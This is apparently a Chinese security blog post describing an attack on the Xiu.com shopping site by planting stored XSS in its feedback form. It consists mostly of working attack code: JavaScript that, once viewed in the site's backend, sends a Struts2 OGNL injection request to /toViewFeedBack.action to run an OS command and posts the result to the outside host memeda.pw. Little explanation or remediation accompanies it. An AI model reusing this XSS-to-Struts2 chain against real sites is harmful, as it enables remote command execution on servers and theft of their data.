走秀网利用XSS+STRUCT2任意执行命令 – 网站安全 –插图

在吐槽处插入XSS代码

function up_data(data)
{
var up_result;
var data=encodeURIComponent(data);
var mlhttp=new XMLHttpRequest();

mlhttp.onreadystatechange=function()
{
if(mlhttp.readyState==4)
{
up_result=mlhttp.responseText;
}
}
mlhttp.open("POST","http://www.memeda.pw/g.php",true);
mlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
mlhttp.send("data="+data);

}

function get_web_by_get(url){
var lhttp=new XMLHttpRequest();
var get_result;
lhttp.onreadystatechange=function()
{if(lhttp.readyState==4)
{
get_result=lhttp.responseText;
}
}
lhttp.open("GET",url,false)
lhttp.send();
return get_result;
}

var sdata=get_web_by_get("/toViewFeedBack.action?('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\\43webRootzpro\\75@java.lang.Runtime@getRuntime().exec(\\43req.getParameter(%22cmd%22))')(d))&(i)(('\\43webRootzproreader\\75new\\40java.io.DataInputStream(\\43webRootzpro.getInputStream())')(d))&(i01)(('\\43webStr\\75new\\40byte[51020]')(d))&(i1)(('\\43webRootzproreader.readFully(\\43webStr)')(d))&(i111)(('\\43webStr12\\75new\\40java.lang.String(\\43webStr)')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43webStr12)')(d))&(i99)(('\\43xman.getWriter().close()')(d))&cmd=whoami");
up_data(sdata);

 

    上一篇: 2345论坛过滤不严可任意编辑他人帖子 - 网站安全

    下一篇: Tipask全版本通杀持久型XSS漏洞 - 网站安全 - 自学
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《走秀网利用XSS+STRUCT2任意执行命令 – 网站安全 –
   

还没有人抢沙发呢~